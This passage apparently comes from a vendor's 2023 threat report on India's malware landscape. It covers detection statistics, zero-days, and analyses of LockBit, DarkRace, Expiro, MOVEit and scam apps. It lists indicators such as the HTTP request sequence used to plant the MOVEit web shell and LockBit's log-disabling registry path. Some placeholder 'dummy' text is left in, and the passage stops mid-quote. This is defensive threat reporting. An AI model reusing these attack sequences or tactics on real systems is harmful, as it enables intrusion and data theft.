computer hosts. Each detection represents a potential gateway for cyber adversaries
to compromise system integrity and extract sensitive information. By scrutinizing these
instances, the report aims to provide valuable insights into the tactics employed by attackers
and equip cybersecurity practitioners with the knowledge needed to strengthen defences.
LNK.Exploit.Gen
Host Based Exploits Detections
LNK.Exploit.Gen 55,11,892
LNK.Cmd.Exploit.F 1,51,18,452
LNK.Exploit.Cpl.Gen 15,14,979
LNK.USB.Exploit 3,12,667
JPEG.Exploit.ms04-028 6,23,886
5.5 mn
LNK/Pantera, A classified trojan is a type of malware that performs activities without the user’s knowledge. These activities commonly
include establishing remote access connections, capturing keyboard input, collecting system information, downloading/uploading files,
dropping other malware into the infected system, performing denial-of-service (DoS) attacks, and running/terminating processes.
Dorkbot, a widespread botnet, specializes in stealing online payments, conducting distributed denial-of-service (DDoS) attacks, and
delivering various malware types. Used globally, it poses a significant threat. Dorkbot-infected systems are weaponized for cybercrime,
enabling the theft of sensitive data, initiation of DoS attacks, disabling of security safeguards, and distribution of multiple malware strains.
Typically, Dorkbot spreads through malicious links in social networks, instant messaging programs, or infected USB devices. Its backdoor
functionality Ex`mpowers remote attackers to download and execute files, harvest logon information, and manipulate domain access.
Vigilance is crucial to thwart this pervasive threat.
Jenxcus worm family poses a significant threat by granting unauthorized access and control of your PC to malicious hackers. Additionally,
it has the capability to collect and transmit your personal information to these attackers. The infection commonly occurs through drive-
by download attacks or by visiting compromised webpages, and it can also be introduced through the use of infected removable drives.
Users should exercise caution to mitigate the risk of this intrusive and potentially harmful threat..

28
LNK.Exploit.Gen
LNK.Exploit.Cpl.
Gen
15.1 mn
1.5 mn
Dinihou, a worm, gains entry through
removable drives and is typically introduced
to a system as a file dropped by other
malware or unknowingly downloaded by
users visiting malicious websites. Once
present, it replicates by dropping copies of
itself onto all connected removable drives.
Worms like Dinihou have an inherent ability
to autonomously propagate to other PCs,
utilizing various methods such as copying
to removable drives, network folders, or
spreading through email. This autonomous
spread increases the risk of widespread
infection and underscores the importance of
proactive security measures.
CVE-2010-2568 is a detection for malware
exploiting a critical remote code execution
vulnerability, CVE-2010-2568, present in
specific Microsoft Windows versions. This
vulnerability stems from the incorrect
parsing of shortcuts, enabling the execution
of malicious code upon opening an infected
LNK file. Notably, this flaw was exploited
by the Stuxnet threat and other malware
families. This vulnerability also played a
significant role in exploit kits used for cyber-
espionage campaigns.

29
Android Detections 2023
Mobile devices continue to replace laptops and desktop computers for
many functions, including electronic banking, mobile payments, messaging
apps, and social networks. In fact, 60% of all Internet traffic in 2022 was
generated by mobile devices.
In 2022, nearly 71% of mobile devices worldwide used the Android
operating system.
In 2023, the following threats were observed:
Significant rise in Adware and Potentially Unwanted Applications
(PUAs)
Malware continues to dominate as a threat for Android.
Based on the analysis of 500K installations, it was observed that
approximately 2-3 attacks per month are detected on Android
mobiles.
Given the extensive use of mobile devices for office work, this poses
significant risk to corporate networks if these attacks go undetected
in the absence of Android protection.
Malwares
PUA
Adwares
500K Installation Base
39%
29%
32%

30
Top Zero Days of 2023
This section casts a spotlight on Host-Based Exploits, a critical facet of the digital threat landscape. Examining the detections of prominent host-based exploits,
including dummy text for the prevalence and impact of these exploits on individual computer hosts. Each detection represents a potential gateway for cyber
adversaries - dummy to change.
CVE-2023-34362
CVE-2023-3460
CVE-2023-23397
CVE-2023-36884
CVE-2023-38831
1
2
3
4
5
SQL Injection
MOVEit Transfer
Transfer database if exploited by unauthorized individuals
Privilege Escalation
Windows Microsoft Outlook
Authenticate as the intended user and launch relay attacks
File extension Spoofing
Winrar
Contains executable content to process desired actions
Privilege Escalation
User registration and account management plugin in the WordPress CMS
Creates users on WordPress websites running vulnerable versions of the Ultimate Member
WordPress Plugin with admin privileges.
Remote Code Execution
Windows HTML and Microsoft Office
Run scripts remotely and get beyond established system defenses
Method Target Description

31
CVE-2023-36884 : remote Code execution in Microsoft Office and Windows HTML
The discovery of a zero-day vulnerability in MOVEit Transfer has brought attention to the potential risks of unauthorized access as MOVEit Transfer is
widely recognized as a secure and popular managed file transfer program utilized by enterprises to safely transfer data using protocols such as SFTP,
SCP, and HTTP-based uploads. A SQL injection vulnerability can grant them access to the MOVEit Transfer database if exploited by unauthorized
individuals. This vulnerability is actively targeted, with attackers leveraging HTTP or HTTPS channels to exploit unpatched systems.
A major security flaw in Windows HTML and Microsoft Office has been identified as CVE-2023-36884. It represents a particular kind of threat called
“Remote Code Execution,” which basically gives an attacker a way to run scripts remotely and get beyond established system defenses. The exploit
involves creating Microsoft Office documents with malicious intent in order to run remote malware.
The Windows Microsoft Outlook client has a vulnerability called CVE-2023-23397 that may be exploited by sending a specially crafted email that sets
off an automatic trigger when the Outlook client processes it. The exploit can be activated without any involvement from the user.
The Net-NTLMv2 hashes of the targeted user will be exposed if the vulnerability is exploited. The threat actor might then use this to authenticate as
the intended user and launch relay attacks against additional systems that support NTLMv2.
CVE-2023-38831 is an RCE vulnerability in WinRAR prior to version 6.23. The problem arises because a ZIP archive may contain both a harmless file
(such a regular.JPG file) and a folder with the same name as the harmless file. When an attempt is made to retrieve only the benign file, the contents
of the folder which can contain executable content are processed.
A well-known user registration and account management plugin in the WordPress content management system has a privilege escalation
vulnerability that allows malicious actors to create users on WordPress websites running vulnerable versions of the Ultimate Member WordPress
Plugin with admin privileges. It can yield in serious repercussions such as the WordPress website being completely taken over or compromised.
CVE-2023-34362: SQL Injection in MOVEit Transfer
CVE-2023-23397 : Microsoft Outlook Privilege Escalation
CVE-2023-38831: File extension Spoofing in WINRAR
CVE-2023-3460: A Privilege Escalation Vulnerability in Ultimate Member WordPress Plugin

32

33
India Malware
Landscape

34
India Malware Landscape: Geographical Analysis
290 mn Detections
Top 10 States with Highest Malware Detections
~ 70% of the total detections originate from these states.
GUJARAT
HARYANA
DELHI
WEST BENGAL
MADHYA PRADESH
UTTAR PRADESH
TAMIL NADU
TELANGANA
MAHARASHTRA
11%
08%
11%
08%
07%
07%
14%
15%
09%
% age Detections/Endpoint Detections
Source: https://www.surveyofindia.gov.in/pages/outline-maps-of-india
Disclaimer: The data that has been rationalized and the insights provided are
depicted as per SEQRITE installation base.
51.99 mn
11 mn
60.64 mn
27.90 mn
9.26 mn
21.53 mn
20.14 mn
13.88 mn
71.68 mn
4
7
3
8
2
1
6
10
KARNATAKA
10%
23.69 mn
5
9
The number of detections
varies across different
states of India, depending
on the installation
base, the availability of
computing devices, and
the presence of IT/ITeS
industries.
Telangana and Tamil
Nadu have the highest
ratio of detections
per installation, while
Maharashtra, Gujrat and
Delhi have the highest
absolute number of
detections.
Gujarat and Madhya
Pradesh show an increase
in detections, reflecting
the emergence of new IT/
ITeS hubs in these states.

35
Source: https://www.surveyofindia.gov.in/pages/outline-maps-of-india
Disclaimer: The data that has been rationalized and the insights provided are
depicted as per SEQRITE installation base.
160 mn Detections
Top 10 Cities with Highest Malware Detections
~40% of the total detections originate from these cities.
SURAT
GURGAON DELHI NCR
KOLKATA
CHENNAI
HYDERABAD
AHMEDABAD
MUMBAI
PUNE
15%
11% 06%
10%
12%
12%
08%
07%
07%
% age Detections/Endpoint Detections
~ 14 mn
7.5 mn ~ 20.18 mn
~21 mn
9.53 mn
~ 12 mn
~ 12 mn
~ 27 mn
~ 19 mn
1
6
4
3
7
9
8
BENGALURU
12%
~17 M
2
A city-wise analysis
reveals that Mumbai,
Pune, Chennai and
Bangalore have the
highest number of
detections in absolute
terms. Surat and
Ahmedabad, which
have emerged as new
IT/ITeS hubs, have high
detections relative to
their installation base.
The top 10 cities
account for more than
50% of the detections,
while the remaining
detections are spread
across tier II and III cities
and towns in India.
This may be due to
the rise of work-from-
hometown culture amid
the pandemic.
10
5

36
India Malware Landscape: Sectoral Analysis
Automobile Supply Chain
Government
Education
Power & Energy
Hospitality
Healthcare
Logistic
Media & Entertainment
Manufacturing
Strategic & Public Enterprises
Transport
Professional Services
Telecom
IT/ITES
BFSI
13%
10%
10%
8%
8%
8%
7%
7%
6%
5%
5%
4%
4%
2%
3%
The Automotive Supply Chain, Government and
Education are the top three industry segments with
the highest malware detections per installation
base across the industry.
The automotive industry, which was once relatively
immune to widespread and notorious threats, has
become a prime target for malicious actors who
seek to disrupt operations, steal sensitive data, and
compromise supply chains. In 2023, we observed
an escalation in both the volume and the impact of
cyber-attacks on the auto industry.
India is one of the most vulnerable countries to
state-sponsored threat actors, especially those
targeting government agencies.
Some of these cyber attacks are orchestrated by
state-backed actors on strategic occasions such as
the G20 summit.
The Education sector faces common attack vectors
such as phishing and user account compromise.
User account compromise is prevalent in this
sector, as it manages a variety of accounts for
staff, third-party contractors, educators, students,
alumni, etc., with a high turnover rate. The most
dominant threat in the education sector was W32.
Neshta.C8, a malicious software that poses a
formidable challenge to educational institutions.
INDUSTRY-WISE PERCENTAGE DETECTIONS PER INSTALLATION BASE

37
The Power and Energy sector in India is a critical
component of the country’s economic growth story,
making it a lucrative target for cyber attackers that
can cause significant service disruptions and physical
damage to infrastructure. The attackers target different
departments such as supply and procurement, cloud
and infrastructure, legal, IT and OT. Cyber supply chain
risk visibility is essential to mitigate threats in this
sector. The revived new variant of Expiro infector has
the highest detections in this sector.
As India progresses towards digitalizing the healthcare
sector, it has become imperative to secure the online
systems. According to a new study by Sophos, a UK-
based cybersecurity firm, reported by the Economic
Times, nearly 60% of healthcare organizations in India
have experienced a cyberattack in the past 12 months.
Nimda variant was the most prominent threat with the
highest detections in the Healthcare and Hospitality
segment.
Indian manufacturing firms faced increased risks from
unsecured IoT devices connected to the network, more
than any other sector. Manufacturing organizations
believe that 5G adoption will exacerbate security gaps.
The sector suffered ransomware attacks that halted
manufacturing operations. The SMEs in this segment
endured sophisticated social engineering phishing
attacks.
In addition to manufacturing, the logistics, banking
and financial sectors are also under the radar of
cyber-attacks. The financial sector is leading the digital
transformation and with the platform economy in
action, attacks on low-value transaction businesses
are also relevant. Lending apps that request access
to sensitive information surged in India during this
period.
Trait: Infects files by appending its virus code
to the files. Enters the system from cracked
softwares, Drive-by-download, Malvertising
campaigns etc. Steals browser certificates and
passwords & store at
%AppData%|<random_hex_values>.bin. Creates mutexes
~2000 Endpoints
13,000 +
Power & Energy
~5in every
10 detections
W32. Expiro.R3
Trait: Gains access via hacked sites/links, installs
from malicious sources, auto-runs on startup, alters
system files/registry, degrades performance with
resource-intensive bitcoin mining, and opens a
backdoor for other malware.
~11,800 Endpoints
2,17,000+
Automobiles
~6in every
10 detections
Trojan.NSIS.Miner.SD
Trait: Enables remote installation, execution, and
updates of applications, programs, and files on
Windows network systems.
~2,84,000 Endpoints
30,4000 +
Government
~2in every
10 detections
Remoteadmin.Remoteexec
Trait: It self-extracts data, executes a dropped
binary, and establishes autorun at Windows
startup.
~1,58,000 Endpoints
8,53,000+
Education
~4in every
10 detections
W32.Neshta.C8

38
Trait: Employs multiple techniques: extracting code,
creating memory, dropping/executing binaries, using
Windows utilities, keystroke logging, autorun at startup,
file attribute manipulation for false deletion appearance,
self-replication, altering Explorer settings, encrypting
files, and obstructing access to the victim’s workstation.
~3,900 Endpoints
11,000+
Logistics
~2in every
10 detections
Trojan.YakbeexMSIL.ZZ4
Trait: Drops a file and can deliver and execute well-
known malware like Skype spy or antivirus service
killers; it also transmits victims’ IP addresses and
related data to the malware authors, often disguising
itself with icons resembling genuine Windows
applications.
~2,85,000 Endpoints
5,02,000+
Professional Services
~2in every
10 detections
Trojan.KillAv.DR
Trait: Introduces a vulnerability, allowing potential
hackers to infiltrate and deploy Trojan horse
software for unauthorized data access and control.
~13,800 Endpoints
10,500+
Media & Entertainment
~1in every
10 detections
Trojan.Rdpwrap
Trait: Deploys a .LNK file as a shortcut to its main
executable, leveraging CVE-2010-2568 to execute
arbitrary code on victim machines, a vulnerability
famously exploited in Stuxnet.
~2,20,000 Endpoints
3,32,000+
Manufacturing
~1in every
10 detections
PIF.StucksNet.A
Trait: Quarantine to prevent spreading or
removes files entirely as per F-Secure security
settings.
~1600 Endpoints
4700+
Transport
~4in every
10 detections
Script.Trojan.A3676696
Trait: Infects files, deploys a malicious DLL, and
sends system information to a remote server.
~47000 Endpoints
87,000+
BFSI
~5in every
10 detections
W32.Pioneer.CZ1

39
Trait: Exploits specific SMB vulnerabilities, named after
the group that disclosed them, the ShadowBrokers
(aka Equation group).
~4800 Endpoints
12,600+
Strategic & Public
Enterprises
~2in every
10 detections
Trojan.Shadowbrokers
Trait: The malware drops and executes a file in
the system32 folder, establishes a connection to a
malicious website, alters the browser’s start page via
registry modification, and creates a persistent Run
entry for the dropped file.
~69,900 Endpoints
48,500+
IT/ITES
~1in every
10 detections
Worm.AUTOIT.Tupym.A
Trait: Mines cryptocurrency, avoiding performance
issues and intrusive ads, highlighting the need for its
prompt removal to safeguard the system.
~1600 Endpoints
7,000+
Telecom
~7in every
10 detections
Nsis.Bitmin
39

40

41
Featured Stories
2023

42
Cryptocurrency Conundrum:
Unveiling the Enigma of Cryptojacking
Exploits
Criticality: High
Sectors Targeted: All
Countries Affected: Worldwide
Cryptojacking is illegal cryptomining, cybercriminal secretly uses
someone else's resources, without their knowledge or permission,
to mine cryptocurrencies. Large-scale Cryptojacking is emerging as a
popular trend in the world of cyber crime.
Engaging in mining activities does not require extensive technical
expertise, as the essential tools are frequently open-source or easily
accessible for purchase. The emergence of cloud mining has heightened
the risk of increased incidents. Moreover, the algorithm utilized in
Cryptojacking is remarkably efficient with CPUs, negating the necessity
for a GPU. This efficiency enables malicious actors to deploy miners such
as XMRig across devices.
This encompasses utilizing cloud services, such as using Kubernetes
clusters for mining the cryptocurrency Dero, and even targeting Android
devices.
Over the past year, there has been an observed increase in hits from the
NiceHashMiner payload, reaching a peak in the month of July 2023. Rise in
cross-platform malware is also observed.
Security professionals should be vigilant for the following malware
associated with Cryptojacking attacks: HonkBox (MacOS), Scrubcrypt
(targets Oracle WebLogic Servers and bypasses Windows Defender
protections), Lucifer Trojan (targets both Windows and Linux), and
QubitStrike Campaign (targets Jupiter Notebooks).
42

43
37% 14.3m
Annual increase in cases
Detections
XMRig
prominent Malicious Actor
Cross-Platform
Malwares
ATTACKER
VICTIM/USER WEBSITE SERVICE PROVIDER
Attacker inserts
malicious script into the
website
1
The results are sent its are
sent to the attacker
8
Victim accesses that website
2
Mining is
performed
6
Results of mining are send to the Service Provider
7
Script requests for mining task
3
Service Provider assigns task
4
Script executes the task on the
victim's machine
5

44
Uncovering LockBit Black’s Attack
Chain and Anti-forensic activity
Since the dissolution of the Conti ransomware group, the LockBit group
has emerged as a dominant force in the cybersecurity landscape. This
transition is marked by the adoption of new extortion techniques and
the implementation of a groundbreaking bug bounty program. The
LockBit 3.0 variant, subject to thorough investigation and analysis,
exhibits a high infection vector and a sophisticated attack chain
characterized by significant anti-forensic measures.
LockBit’s 3.0 variant, specifically the Black variant, has been observed
engaging in anti-forensic activities. These activities include the simultane-
ous clearing of event logs, termination of multiple tasks, and the deletion
of services. The group uses various tactics for initial network access, such
as SMB brute-force attacks from diverse IPs, allowing for lateral move-
ment across the victim's network to execute the ransomware payload.
The group uses the sys-internal tool PSEXEC to execute malicious BAT
files on a single system, leaving traces indicative of modifications to RDP
and authentication settings, along with the simultaneous disabling of
antivirus solutions. PSEXEC is also leveraged for lateral movement within
the victim's network. The malware employs encryption with a
multi-threaded approach, selectively targeting shared drives. Encrypted
files bear the distinctive “.zbzdbs59d” extension, hinting at the generation
of each payload with a random static string.
The encryption utilizes a multi-threaded approach, exclusively targeting
shared drives. To execute the payload successfully, a valid key must be
passed along with the command-line option ‘-pass.’ Encrypted files bear
the distinctive “.zbzdbs59d” extension, suggesting that the builder
generates each payload with a unique, randomly generated string. It is
vital that each payload is accompanied by a valid key for file encryption.
In instances where Admin privileges are lacking during execution, the
malware uses CMSTPLUA COM to circumvent the UAC prompt,
leveraging the legitimacy of the Windows Connection Manager Service.
Anti-debugging techniques are also observed, along with the tactic of
changing the wallpaper. Despite the builder being leaked, LockBit 3.0
has ascended to the forefront of the Ransomware-as-a-Service (RaaS)
model. This is attributed to the introduction of its bug bounty program
and the adoption of innovative extortion tactics. Remarkably, the threat
has persisted even as malicious actors create their own variants based
on the leaked builder.
Criticality: High
Sectors Targeted: Healthcare, Finance,
Manufacturing, Transportation and
Government agencies.
Countries Affected: United States,
United Kingdom, Canada, Japan,
Germany, India.

45
Initial Access
SMB Brute Force of
unprotected systems
Execution
of Malicious
BAT scripts
Initial Access
PsExec to run the
ransomware
Encryption
of Shared Drives
BAT
After initial access via SMB
brute forcing, malicius BAT
files are executed to modify
authentication settings and
disabling AV - openrdp.bat,
mimon.bat, auth.bat etc.
Pseudo code for decrypting
PE Sections. TEXT, DATA, and
PDATA are 3 sections
decrypted in memory.
Privilege escalations - UAC
Bypass using CMSTPLUA
Thread Hide From
Debugger. This hinders
dynamic analysis by
inhibiting debug information
from the current
ransomware thread to reach
the attached debugger.
Logs are disabled by setting
multiple registry subkeys to
value 0.
HKLMSOFTWAREMicrosoftWi
ndowsCurrentVersionWINEVT
Channels *Specifically,
Windows Defender is
disabled for evasion.
Ransomware Note on
Screensaver
Files are encrypted by
creating multiple threads
where each filename is
replaced with a random
string generated and
appending the extension to
them. With full encryption
completed under 2 minutes
Before encryption, the
ransom note is created in
every directory except the
Program Files and the
Windows directory, which are
not encrypted
Process terminated includes
SecurityHealthSystray.exe
and the mutex created
during execution was
13fd9a89b0eede2627293472
8b390e06
01 02 03 04 05
09 08 07 06
All your important files are
stolen and encrypted!
You must find
zbzdbs59d.README.txt file and
follow the instruction!
LockBit Black

46
Fake applications disguised
as legitimate ones
Criticality: High
Targets: Android Users
Countries Affected: India
In a recent alert, the Indian Railway Catering and Tourism Corporation
(IRCTC) cautioned users about a malicious Android app, irctcconnect.apk,
that circulated on messaging platforms like WhatsApp and Telegram.
The fraudulent app, masquerading as an official IRCTC app, posed a
serious risk to users by functioning as spyware.
The deceptive app was capable of stealing Facebook and Google
credentials, extracting codes from Google Authenticator, tracking GPS
and network locations, recording videos using the Camera API, and
collecting information about installed applications on users' devices.
IRCTC's advisory emphasized the app's malicious nature and warned users
against downloading it. The phishing links, distributed widely,
impersonated IRCTC officials to trick users into revealing sensitive net
banking credentials, including UPI details and credit/debit card
information.
Antivirus programs have the capability to identify and detect malicious
applications, specifically those that share similarities with
"Android.SpyNote.GEN."
46

47
On Screen Behind the Screen
IRCTC
Fake IRCTC App
Fake App disguised as
legitimate IRCTC App
Fake app seeking
permissions on the
infected device
Android.SpyNote.GEN.
1. 45c154af52c65087161b8d87e212435a�
2. c01566f5feb7244ed4805e2855ebdc400�
3. c77435e6e77152d24e86eb75e1f04d75
Indicator of Compromises (IOCs)
Social Media
Credentials Stealing
Collecting Location
Information
Collecting Installed
Applications Info

48
Countermeasures
Battling the death trap of
malicious loan apps
In the age of instant finance at our fingertips, loan apps have reshaped
how we access funds. However, beneath the convenience lies a
concerning trend—malicious apps that are being linked to tragic
outcomes. A spate of tragic deaths has occurred in the last 2-3 years PAN
India. The reason: seemingly genuine loan applications with sinister
motives behind them. Victims comprise individuals who opted to take
loans from such apps but ended up committing suicide instead, driven
by harassment, blackmail, and abuse by operators of these loan apps.
These applications offer small loans without requiring much paperwork
but, in turn, charge heavy interest rates and often resort to extortion
through morphed photographs and cyberbullying. Many of these apps
compel users to share unnecessary information, including contact
details, photographs, location, and more. Subsequently, the operators
behind these apps use these details to harass the victim with defamatory
messages and manipulated photographs sent to their contacts, and so
on. This unwarranted harassment leads to some users experiencing
depression and attempting suicide out of fear of public humiliation.
These applications request permissions, and a few of these permissions
are unnecessary, such as android.permission.BLUETOOTH and
android.permission.READ_CALL_LOG.
Google has been proactive in removing 3500 such applications from their
Play Store and mandated that developers to take measures such as set the
application category to ‘finance’, mention the minimum and maximum
period of repayment, mention maximum annual percentage rate which
may include interest and other fees. In addition to this, Google has also
restricted loan apps which require repayment in full within 60 days.
Personal loan applications are no longer allowed to access sensitive data,
such as photos and contacts.
Reserve Bank of India (RBI) has also published guidelines that states that
Regulating Entities (RE) should ensure that their DLA (Digital Lending
Applications) should not access mobile phone resources like media, contact
list, call logs or telephony functions.
Criticality: Medium
Targets: Android Users
Countries Affected: India

49
Reported Loan applications Permissions declared by App
Process followed by these applications to retrieve sensitive information Indicators of compromise(IoC)
READ_PHONE_STATE
CAMERA
READ_SMS
CHANGE_WIFI_STATE
ACCESS_WIFI_STATE
INTERNET
ACCESS_COARSE_LOCATION
ACCESS_COARSE_LOCATION BLUETOOTH
READ_CALL_LOG
Run-time contact access
Accessing external storage
Location access code
Application Name
Future Rupee – Credit Loan
InstaNova – Easy Instant Loans
Mobile Money
Salina Loan
CA loan
Fast Loan- Speed Cash Loan
Toop Loan
Credit Wallet: Easy Loans
Asher Loan
Package Name
com.future.cash.rupee
com.wavfge.magﬁn
com.mobile.money.cash
com.salina.loan.mountain
com.assistance.career.loansindia
com.fastloan.cashloan.instantloan.loanapp
in.azme.high.top.loan
com.ceditwallet.now
com.asher.loan.cocla

50
Expiro: Old virus poses a
new challenge
Expiro is no stranger in the family of viruses, having existed since 2011.
However, over the last one and a half years, a sudden surge in Expiro
cases has been witnessed, primarily targeting regions in India. Two
different versions of Expiro, one involves a multiple-layered, complex
code to retrieve patched code from the infected file, and the other
version modifies the imports of the clean file. Despite the differences,
both versions share the common goal of infecting executable files on the
system by appending virus code at the end. Upon execution, the infector
code is run, and the malicious call is patched with a new address to
execute the benign code. Restoring the file to its original offset proves
challenging due to the compressed and encrypted nature of the
overwritten code, which gets decrypted during runtime through highly
obfuscated decompression and decryption routines.
Criticality: High
Sectors Targeted: Power and Energy
Regions: South Asia
The infection routine is executed in a manner that allows user applications
to run seemingly normally, unbeknown to the user. This Expiro variant
possesses the capability to check network-mapped drives, infecting
executable files on those drives and potentially spreading the infection
across the network. Additionally, observations indicate this variant
performing backdoor capabilities by connecting to remote servers. Expiro
can receive commands from these servers, executing them on the infected
system, including the installation of other malware capable of stealing and
uploading sensitive information.
50

51
Expiro possesses capabilities to accept
commands from its controller and execute
them on the infected systems.
With successful commands delivered to
victims, Expiro can:
Install other malwares (like
keyloggers, spywares, ransomware,
etc.)
Steal and upload sensitive
information
Disable security software from the
systems
Hijack servers
Establish itself to act at a later point
in time
Power and Energy sector had maximum detections of Expiro attacks
The infection vector:
Cracked or patched version of
software
Driven-by-download: File download
upon visiting an infected website
Dropped by some other malware,
USB drives, Malvertising campaigns,
etc.
Infects both 32-bit and 64-bit executable
files. The new variant of Expiro is a type of
“Appender” virus, that infects files by
inserting virus code at the end of the file,
specifically the last section of the executable
file.
File Infection Process
Source
The new variant of Expiro patches a call in the
executable section that further jumps to the last
section, at an offset where the malicious virus
code is present. The code to calculate and select
which Call to patch is highly obfuscated.
Upon analysing multiple files of this variant, it
was found that the decompressed buffer for
most of the infected files remains same and the
wrapper keeps changing.
After successful decompression and decryption,
the infected application is launched, and it starts
infecting other executables present in the
system.
Due to the use of obfuscated call patching
routine and encrypted virus code data, it is
challenging to clean infected codes with
complete accuracy.
Risks posed by Expiro

52
DarkRace Ransomware:
A deep dive into its techniques
and impact
Brief:
DarkRace ransomware is a derivative of the infamous Lockbit
ransomware, incorporating heavily from its leaked source code.
How it spreads:
Cracked Software Infiltration: The ransomware discreetly enters
systems through cracked software installations using obfuscator
technology.
Phishing Email Attacks: DarkRace employs social engineering in phishing
emails, deceiving users into activating exploit kits and initiating
ransomware attacks.
This section below delves into the key characteristics and tactics
employed by DarkRace, shedding light on its intricate functionalities.
Criticality: High
Sectors Targeted: Manufacturing,
Financial, Transportation, Science
& Technology
Regions: Europe and United States
Mutex Checks: Efficient Resource Utilization and Stealth Operation
DarkRace implements Mutex checks on infected systems, a strategic
measure to prevent multiple infections on the same system. This not
only ensures efficient use of resources but also mitigates the risk of
detection arising from excessive activity. By employing Mutex checks,
DarkRace operates stealthily, enhancing its overall effectiveness in
compromising targeted systems.
Runtime Decryption: Unveiling Crucial Information Dynamically
The ransomware incorporates runtime decryption mechanisms for XML
data, encompassing critical information such as the ransom note,
whitelisted files, folders, and extensions. This dynamic decryption approach
allows DarkRace to adapt its tactics during runtime, maintaining flexibility
and further complicating efforts to counter its malicious activities.
Encryption using Salsa20: Speed and Security in File Compromise
DarkRace leverages the Salsa20 stream cipher, renowned for its speed
and security, as the encryption algorithm of choice. This robust
encryption method is employed to encrypt files on the victim's system,
appending a random extension to them. This deliberate action renders
the files inaccessible until a ransom is paid to acquire the decryption key,
adding a layer of complexity to recovery efforts.
Post Encryption Measures: Heightened Security
Evasion and Covering Tracks
Post-encryption, DarkRace adopts additional measures to make recovery
more challenging. This includes the deletion of shadow copies, hindering
traditional recovery methods. Going a step further, DarkRace terminates
processes that might interfere with its operation or could potentially be
used to recover encrypted data. After executing its malicious activities,
the ransomware takes the drastic step of deleting its own files and
restarting the system. This deliberate act adds an extra layer of
complexity, making it exceptionally challenging for cybersecurity experts
to trace its activities and develop effective countermeasures.

53
Mutex Checks
Prevents multiple infections on the
same system for efficient resource
utilization.
Avoids detection by limiting
excessive activity.
Runtime Decryption
Decrypts XML data, revealing
information like ransom notes and
whitelisted files.
Enhances flexibility and adaptability
in handling encrypted content
Encryption with Salsa20
Utilizes the salsa20 stream cipher
for swift and secure file encryption.
Appends a random extension to
files, rendering them inaccessible
until ransom payment.
Post Encryption Measures
Deletes shadow copies to hinder
recovery efforts.
Terminates interfering processes,
covering its tracks, and restarts the
system for added evasion.
Checking the Existing
Mutex Object
Decrypted XML
Format String
Gets the Drives
Deleting the
Event Logs
Deleting the
shadow copy
Retrieves Services
from the XML Data
Ransom Note

54
Critical Zero Day Vulnerability
in MOVEIT transfer
MOVEit Transfer is widely recognized as a secure and popular managed file transfer program utilized by enterprises to safely transfer data using protocols such
as SFTP, SCP, and HTTP-based uploads. This specific vulnerability, referred to as “CVE-2023-34362”, heightens the risk of unauthorized access and exploitation of
elevated privileges within the system.
Criticality: High
Sectors Targeted: Government,
Finance, Media, Aviation,
Healthcare
Countries Affected: United States
Through this deployed web shell, the
threat actor gains continued backdoor
access to the compromised system,
establishing a means for continuous
control. Subsequently, they initiate
data exfiltration activities, secretly
extracting sensitive information
without authorization.
Certain patterns of requests
are frequently observed when
attempting to implant
malicious web shells.
The vulnerability is actively targeted,
with attackers leveraging HTTP or
HTTPS channels to exploit. After
successfully exploiting the
vulnerability, the attacker deploys a
web shell (human.aspx), a hidden
entry point for future access.
It initiates from a SQL injection
vulnerability that could grant
unauthorized individuals access to
the MOVEit Transfer database if
exploited.
Update MOVEit Transfer:
Upgrade to patched versions: MOVEit Transfer
2023.0.1, 2022.1.5, 2022.0.4, 2021.1.4,
2021.0.6.
Disable HTTP and HTTPS Traffic:
Modify firewall rules to block incoming traffic on
ports 80 and 443, preventing potential attacks on
MOVEit Transfer.
Remove Unauthorized Files and Users:
Delete "human2.aspx" and scrutinize and
eliminate
Steps for prevention
GET / - on port 443
POST /guestaccess.aspx - port 443
POST /api/v1/token - port 443
GET /api/v1/folders - port 443
POST /api/v1/folders/[PATH/files upload Type-resumable - port 443
POST/machine2.aspx - port 80
POST/moveitisapi/moveitisapi.dil - port 443
POST /guestaccess.aspx - port 443
PUT /api/v 1/folders/[PATH/files uploadType-resumable& fileId-[FILEID] - port 443
POST/machine2.aspx - port 80
GET /human2.aspx - port 443
Observed patterns of requests
File Upload
File Upload
SQL Injection
Access Webshell
These patterns often serve as indicators of compromise. The software provider quickly develops a patch to fix the identified vulnerability, ensuring users can update their
MOVEit Transfer installations and protect their systems from potential exploitation.
54

55
OneNote Exploits:
The latest weapon in cybercrime
OneNote, with a significant installation base worldwide and extensive
use for note maintenance is facing a new malware distribution method
that raises concerns among users. Malicious actors are disguising
malware as OneNote files and distributing them through email and
other messaging platforms. These malicious spam (Mal spam) emails
masquerade as various documents, including DHL shipping
notifications, invoices, ACH remittance forms, mechanical drawings,
and shipping documents.
The attackers embed malicious Visual Basic Script (VBS) attachments
into OneNote notebooks. When an unsuspecting user double-clicks on
these attachments, the malware is launched. Notably, various Remote
Access Trojans (RATs) like AsyncRAT, Quasar RAT, and NetWire have
been observed using OneNote files for their distribution. Many of
these OneNote files contain batch scripts that download the payload
using PowerShell. Additionally, malware families such as QBot, IcedID,
and Emotet have explored this file type.
Criticality: High
Sectors Targeted: Windows Users
Regions: India, China, European Union,
United States, & Africa
In the case of the QBot campaign, the OneNote file contains obfuscated
".hta" files that download DLLs. Conversely, in the Emotet campaign, the
infection chain is different. The OneNote file contains obfuscated VBScript
with a ".wsf" file extension, cleverly hidden from end users. This file, in turn,
downloads the Emotet DLL from a compromised website.
This sophisticated attack methodology poses a high level of criticality,
especially given the widespread use of OneNote globally. Users are urged
to exercise caution, particularly when receiving unexpected documents or
files through email or messaging platforms to mitigate the risk of falling
victim to this threat.
55

56
The Surge of BazaCall and
Caller-Driven Malware Attacks
BazaCall has emerged as a potent technique since 2021, employing
phone calls to entice targets into clicking malicious links and
unknowingly installing malware.
Modus Operandi: Phishing emails with provided phone numbers lure
victims into making calls, where operators convince them to grant
remote access. Simultaneously, network operators exploit this access to
clandestinely install backdoors.
Affiliated ransomware groups leverage this method, recruiting callers
proficient in multiple languages for vishing campaigns using "Callback
Phishing”.
Evolving BazaCall tactics have seen the deployment of notorious
malware strains like BazaarLoader, Trickbot, and IcedID, with a focus on
the US, Canada, and select Asian countries.
Underground forums witness a growing demand for individuals skilled
in caller-based techniques. Some operators, working on bulk orders,
strategically utilize toll-free numbers to avoid SIM blocking,
underscoring the adaptability of this malicious approach.
Corporate entities must be alert to the rising threat of caller-based
services, recognizing them as a new vector for malware infiltration.
Corporate Implications:
56

57
Threat actor seeking
caller services
I am looking for Callers for Ratting Mobile Carrier Store PC's
Namely USA and UK Countries. Candidate must be Fluent in
English and have Prior Experience in this Profession as well
as must be Good in Social Engineering. You will be Provided
